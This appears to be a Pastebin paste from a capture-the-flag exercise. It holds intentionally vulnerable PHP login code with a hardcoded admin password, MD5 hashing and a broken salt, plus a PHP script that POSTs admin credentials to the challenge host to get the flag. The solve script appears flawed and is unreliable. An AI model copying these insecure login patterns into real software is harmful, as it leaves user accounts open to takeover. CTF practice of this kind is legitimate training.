Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // PHP du serveur (leaké)
- <?php
- if ($_SERVER['REQUEST_METHOD'] === 'POST') {
- $username = $_POST['username'];
- $password = MD5($_POST['password']);
- $salt = microtime();
- // plaintext is fine nobody sees this anyway and I have a secure salt !
- $admin_password = 'supersecurepassword';
- $admin_hash = MD5('$salt'.'$admin_password');
- if($username === 'admin' and $password === $admin_hash){
- echo file_get_contents('flag.txt');
- }
- else{
- echo "<script>alert('Wrong password !');</script>";
- }
- }
- ?>
- // PHP de la requete POST HTTP
- <?php
- $url = 'https://mindblown.capturetheflag.be/';
- $admin_password = 'supersecurepassword';
- $salt = microtime();
- $password = $salt.$admin_password;
- $data = array('username' => 'admin', 'password' => '$password');
- $options = array(
- 'http' => array(
- 'header' => "Content-type: application/x-www-form-urlencoded\r\n",
- 'method' => 'POST',
- 'content' => http_build_query($data)
- )
- );
- $context = stream_context_create($options);
- $result = file_get_contents($url, false, $context);
- if ($result === FALSE) { /* Handle error */ }
- var_dump($result);
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
